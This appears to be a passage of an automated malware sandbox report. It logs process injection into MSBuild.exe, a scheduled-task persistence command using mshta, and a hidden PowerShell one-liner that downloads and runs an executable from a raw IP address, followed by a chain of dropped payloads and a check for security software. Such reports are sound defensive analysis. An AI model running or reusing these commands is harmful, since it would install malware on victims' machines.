                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8A48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8AAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8B10
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8B74
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8BD8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8C3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8CA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8D04
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8D68
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8DCC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8E30
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8E94
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8EF8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8F5C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B8FC0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9024
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9088
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B90EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9150
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B91B4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9218
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B927C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B92E0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9344
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B93A8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B940C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9470
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B94D4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9538
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B959C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9600
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9664
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B96C8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B972C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9790
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B97F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9858
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B98BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9920
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9984
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B99E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9A4C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9AB0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9B14
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9B78
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9BDC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9C40
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9CA4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9D08
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9D6C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9DD0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9E34
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9E98
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9EFC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9F60
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7B9FC4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA028
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA08C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA0F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA154
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA1B8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA21C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA280
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA2E4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA348
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA3AC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA410
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA474
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA4D8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA53C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA5A0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA604
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA668
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA6CC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA730
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA794
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA7F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA85C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA8C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA924
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA988
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BA9EC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAA50
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAAB4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAB18
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAB7C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BABE0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAC44
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BACA8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAD0C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAD70
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BADD4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAE38
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAE9C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAF00
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAF64
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BAFC8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB02C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB090
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB0F4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB158
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB1BC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB220
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB284
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB2E8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB34C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB3B0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB414
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB478
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB4DC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB540
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB5A4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB608
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB66C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB6D0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB734
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB798
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB7FC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB860
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB8C4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB928
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB98C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BB9F0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBA54
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBAB8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBB1C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBB80
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBBE4
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBC48
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBCAC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBD10
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBD74
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBDD8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBE3C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBEA0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBF04
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBF68
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BBFCC
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC030
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC094
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC0F8
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC15C
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC1C0
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC224
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC288
                                Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 7BC2EC
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009C1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_009C1201
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009A2BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_009A2BA5
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009CB226 SendInput,keybd_event,0_2_009CB226
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeCode function: 0_2_009E22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009E22DA
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn nbetgmaZyH8 /tr "mshta C:\Users\user\AppData\Local\Temp\CB6Ixkrbm.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE "C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE" Jump to behavior
                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp6XSYMF2O9XAV55ZHPTDJU7YEQHBVVMYD.EXEProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe "C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe "C:\Users\user\AppData\Local\Temp\1074997001\935372fb1f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe "C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe "C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe "C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe "C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe "C:\Users\user\AppData\Local\Temp\1075002001\d9caf9fc21.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe "C:\Users\user\AppData\Local\Temp\1075003001\c7f37422c5.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1074998001\7ecb69d7f1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
